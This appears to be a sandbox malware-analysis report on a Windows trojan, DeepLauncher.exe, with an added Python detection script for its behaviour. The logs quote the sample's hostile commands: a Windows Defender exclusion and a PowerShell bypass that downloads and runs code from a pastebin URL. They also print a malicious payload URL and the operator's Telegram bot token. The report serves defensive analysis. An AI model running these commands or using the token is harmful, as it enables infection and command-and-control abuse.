Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DeepLauncher.exe | Memory allocated: 1F32EEB0000 memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\DeepLauncher.exe | Window / User API: threadDelayed 1550
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7921
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 615
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7249
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 821
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5647
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 436
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7410
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2109
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300 | Thread sleep count: 7921 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300 | Thread sleep count: 615 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404 | Thread sleep count: 7249 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392 | Thread sleep count: 821 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 | Thread sleep count: 5647 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528 | Thread sleep count: 436 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 | Thread sleep count: 7410 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 | Thread sleep count: 2109 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: DeepLauncher.exe, 00000000.00000003.1795675532.00000233CD6D9000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1738079879.00000233CD6CA000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1736460643.00000233CD692000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1734769390.00000233CD642000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1605965932.000002411B372000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\DeepLauncher.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\DeepLauncher.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\DeepLauncher.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FFB13633843
Source: C:\Users\user\Desktop\DeepLauncher.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\DeepLauncher.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Users\user\Desktop\DeepLauncher.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES27FB.tmp" "c:\Users\user\AppData\Local\Temp\ued2riov\CSCAE107C6CD7AF4B418D296C50EC1D4A12.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: DeepLauncher.exe, 00000000.00000003.1795675532.00000233CD6D9000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1738079879.00000233CD6CA000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1736460643.00000233CD72C000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1795675532.00000233CD72C000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1736460643.00000233CD692000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1734769390.00000233CD642000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\DeepLauncher.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
MITRE ATT&CK Matrix (one line per tactic; the bracketed numbers are the counts shown next to the technique in the report matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation [1]; Command and Scripting Interpreter [2]; PowerShell [1]; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection [111]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Masquerading [1]; Disable or Modify Tools [11]; Virtualization/Sandbox Evasion [31]; Process Injection [111]; Obfuscated Files or Information [1]; DLL Side-Loading [1]; Compile After Delivery
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Query Registry [1]; Security Software Discovery [21]; Process Discovery [1]; Virtualization/Sandbox Evasion [31]; Application Window Discovery [1]; System Network Configuration Discovery [1]; System Information Discovery [12]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Web Service [2]; Encrypted Channel [1]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [4]; Application Layer Protocol [15]; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph (ID 1617346; sample DeepLauncher.exe; start date 17/02/2025; architecture WINDOWS; score 100). Numbers in parentheses after a process are the file/registry counts shown on the graph nodes; "port" is the remote port, "local" the client-side port.

Top-level network nodes: pastebin.com; api.telegram.org; 3 other IPs or domains
Top-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures; Connects to a pastebin service (likely for C&C) [pastebin.com]; Uses the Telegram API (likely for C&C communication) [api.telegram.org]

Process tree:
  DeepLauncher.exe (15) started
    network: 72.5.43.195 port 80 (local 49912), UNASSIGNED, United States; ip-api.com 208.95.112.1 port 80 (local 49886), TUT-ASUS, United States; 2 other IPs or domains
    signatures: Bypasses PowerShell execution policy; Adds a directory exclusion to Windows Defender
    powershell.exe (14, 24) started
      network: pastebin.com 104.20.3.235 port 443 (local 49705), CLOUDFLARENETUS, United States
      dropped: C:\Users\user\AppData\...\ued2riov.cmdline (Unicode)
      signature: Writes to foreign memory regions
      csc.exe (3) started
        dropped: C:\Users\user\AppData\Local\...\ued2riov.dll (PE32)
        cvtres.exe (1) started
      conhost.exe started
    powershell.exe (23) started
      signature: Loading BitLocker PowerShell Module
      conhost.exe started
    powershell.exe started
      conhost.exe started
    powershell.exe started
      conhost.exe started
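The chain in the graph above (PowerShell started with the execution policy bypassed, a Defender exclusion added through a base64-encoded MpPreference cmdlet, Add-Type-style compilation via csc.exe from under the user profile, fetches from pastebin.com/raw and calls to the Telegram Bot API) is what a detection engineer would want as rules rather than as signature names. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it runs such rules over constructed Sysmon-style process and network events and extracts the C2 identifiers from the URLs. The event field names, the file paths, and the bot id, token, chat id and paste id in the sample events are placeholders chosen for the example, not values from this report.

```python
import base64
import re

# --- Constructed sample telemetry (placeholders, not taken from the report) ---
# Field names follow Sysmon-style process-creation and network records (an
# assumption); the values mirror the DeepLauncher.exe -> powershell.exe ->
# csc.exe chain in the behavior graph with made-up paths and identifiers.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LAUNCHER = r"C:\Users\user\Desktop\DeepLauncher.exe"
EXCLUSION_CMD = r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'"
# -EncodedCommand carries base64 of the UTF-16LE script, which hides the
# cmdlet name from naive string matching on the visible command line.
ENCODED = base64.b64encode(EXCLUSION_CMD.encode("utf-16le")).decode()

SAMPLE_PROCESS_EVENTS = [
    {"Image": LAUNCHER, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{LAUNCHER}"'},
    {"Image": PS, "ParentImage": LAUNCHER,
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + ENCODED},
    {"Image": PS, "ParentImage": LAUNCHER,
     "CommandLine": "powershell.exe -ep bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://pastebin.com/raw/Ab12Cd34')\""},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", "ParentImage": PS,
     "CommandLine": r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\abcd1234\abcd1234.cmdline"'},
]
SAMPLE_NETWORK_EVENTS = [  # placeholder bot id, token and chat id
    {"Image": "DeepLauncher.exe",
     "Url": "https://api.telegram.org/bot1234567890:" + "A" * 35 + "/sendMessage?chat_id=1111111111"},
    {"Image": "powershell.exe", "Url": "https://pastebin.com/raw/Ab12Cd34"},
    {"Image": "DeepLauncher.exe", "Url": "http://ip-api.com/json/"},
]

ENCODED_CMD_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
TELEGRAM_RE = re.compile(r"api\.telegram\.org/bot(\d{8,10}):([A-Za-z0-9_-]{35})")
PASTEBIN_RE = re.compile(r"pastebin\.com/raw/([A-Za-z0-9]{8})")
IP_LOOKUP_RE = re.compile(r"ip-api\.com|api\.ipify\.org")


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (UTF-16LE base64), or ''."""
    m = ENCODED_CMD_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def check_process(ev):
    """Return the rule names one process-creation event triggers."""
    image, parent = ev["Image"].lower(), ev["ParentImage"].lower()
    # Match against the visible command line plus any decoded -enc payload.
    low = (ev["CommandLine"] + " " + decode_encoded_command(ev["CommandLine"])).lower()
    hits = []
    if image.endswith("powershell.exe"):
        if re.search(r"-(?:ep|exec|executionpolicy)\s+bypass", low):
            hits.append("powershell_execution_policy_bypass")
        if "add-mppreference" in low and "exclusionpath" in low:
            hits.append("defender_exclusion_added")
        if re.search(r"downloadstring|invoke-webrequest|\biwr\b|invoke-expression|\biex\b", low):
            hits.append("powershell_download_cradle")
    # csc.exe reading a .cmdline response file from AppData, spawned by PowerShell
    if image.endswith("csc.exe") and parent.endswith("powershell.exe") \
            and re.search(r"\\appdata\\.*\.cmdline", low):
        hits.append("csc_compile_from_user_profile")
    return hits


def check_network(ev):
    """Return the rule names one network event triggers."""
    hits = []
    if TELEGRAM_RE.search(ev["Url"]):
        hits.append("telegram_bot_api")
    if PASTEBIN_RE.search(ev["Url"]):
        hits.append("pastebin_raw_fetch")
    if IP_LOOKUP_RE.search(ev["Url"]):
        hits.append("external_ip_lookup")
    return hits


def extract_iocs(url):
    """Pull bot id, bot token, chat id and paste id out of a C2 URL."""
    iocs = {}
    m = TELEGRAM_RE.search(url)
    if m:
        iocs["telegram_bot_id"], iocs["telegram_bot_token"] = m.group(1), m.group(2)
        c = re.search(r"[?&]chat_id=(\d+)", url)
        if c:
            iocs["telegram_chat_id"] = c.group(1)
    m = PASTEBIN_RE.search(url)
    if m:
        iocs["pastebin_paste_id"] = m.group(1)
    return iocs


def triage(process_events, network_events):
    """Run all rules; return ({rule: [image names]}, {ioc name: value})."""
    findings, iocs = {}, {}
    for ev in process_events:
        for rule in check_process(ev):
            findings.setdefault(rule, []).append(ev["Image"].rsplit("\\", 1)[-1])
    for ev in network_events:
        for rule in check_network(ev):
            findings.setdefault(rule, []).append(ev["Image"])
        iocs.update(extract_iocs(ev["Url"]))
    return findings, iocs


if __name__ == "__main__":
    found, iocs = triage(SAMPLE_PROCESS_EVENTS, SAMPLE_NETWORK_EVENTS)
    for rule, images in found.items():
        print(f"{rule:36} {', '.join(images)}")
    print("IOCs:", iocs)
```

Two caveats for use: the Defender-exclusion rule only fires on the encoded variant because decode_encoded_command is applied before matching, so a rule set that inspects only the raw command line misses exactly the case this sample uses; and the bot token that extract_iocs returns is a live credential for the operator's bot (anyone holding it can call the Bot API as that bot), so treat it as a secret when an IOC list is shared rather than pasting it into tickets.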

Screenshots: thumbnails are not reproduced in this text export.
Antivirus detection, submitted file:

Source | Detection | Scanner | Label
DeepLauncher.exe | 16% | Virustotal |
DeepLauncher.exe | 24% | ReversingLabs | Win64.Trojan.Generic

No Antivirus matches
No Antivirus matches
No Antivirus matches

Antivirus detection, URLs:

Source | Detection | Scanner | Label
http://www.microsoft.co5 | 0% | Avira URL Cloud | safe
http://schemas.dataconX | 0% | Avira URL Cloud | safe
https://gunaframework.com/api/licensing.phpPe | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer8 | 0% | Avira URL Cloud | safe
http://ns.adobe.c.0/ti | 0% | Avira URL Cloud | safe
http://72.5.43.195:80/8 | 100% | Avira URL Cloud | malware
http://ns.dob | 0% | Avira URL Cloud | safe
http://api.ipify.org0 | 0% | Avira URL Cloud | safe
http://72.5.43.195/Music.exe: | 100% | Avira URL Cloud | malware
https://gunaui.com/pricing | 0% | Avira URL Cloud | safe
http://api.ipify.orgnotification_sent.flag | 0% | Avira URL Cloud | safe
http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer | 0% | Avira URL Cloud | safe
http://72.5.43.195/Music.exe | 100% | Avira URL Cloud | malware
Domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.12.205 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
pastebin.com | 104.20.3.235 | true | false | | high
206.23.85.13.in-addr.arpa | unknown | unknown | false | | high
Contacted URLs:

Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendPhoto?chat_id=5829712415 | false | | high
https://api.telegram.org/bot7996264390:AAGcousd9x1F2KPKs4fpu1cdEMk88F3jG7I/sendMessage | false | | high
https://pastebin.com/raw/WHKzW2nr | false | | high
URLs from memory and binaries:

Name | Source | Malicious | Antivirus Detection | Reputation
http://html4/loose.dtd | DeepLauncher.exe | false | | high
http://ns.adobe.hotosh | DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005 | DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmp, DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmp | false | | high
https://gunaframework.com/api/licensing.phpPe | DeepLauncher.exe, 00000000.00000002.2563696431.000001F332820000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ns.adobe.c.0/ti | DeepLauncher.exe, 00000000.00000003.1662967255.00000233C8ABB000.00000004.00000020.00020000.00000000.sdmp, DeepLauncher.exe, 00000000.00000003.1663054490.00000233C8AD1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
